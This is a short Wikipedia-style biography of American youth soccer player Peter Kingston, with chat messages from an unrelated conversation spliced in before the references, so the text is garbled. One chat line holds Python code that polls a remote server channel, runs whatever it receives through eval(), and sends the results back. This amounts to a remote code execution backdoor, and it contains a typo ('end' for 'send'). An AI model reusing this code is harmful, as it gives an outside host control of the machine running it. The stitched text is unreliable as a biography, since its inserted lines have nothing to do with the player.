Peter Kingston

Peter Kingston (born July 14, 2001) is an American soccer player who plays for the Seattle Sounders FC academy.

Peter Kingston
Personal information
Date of birth (2001-07-14) July 14, 2001
Place of birth Tukwila, Washington, United States
Height 5 ft 9 in (175 cm)
Playing position(s) Midfielder
Youth career
2015– Seattle Sounders FC
Senior career*
Years Team Apps (Gls)
2018–2019 Tacoma Defiance 5 (0)
* Senior club appearances and goals counted for the domestic league only and correct as of October 25, 2019

Career

Kingston joined the Seattle Sounders FC academy in 2015.[1] He made his debut for USL club Seattle Sounders FC 2 in August 2018.[2]

gollark: Imagine boosting this instead of the [REDACTED].
gollark: I don't think I ever go around *manually* fiddling with tree structures (unless you count source code, which could be represented various different ways).
gollark: It's basically an infinite 2D grid of bad computers with 256B of RAM.
gollark: I made a "usable" esolang, for certain definitions of "usable".
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.

References


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.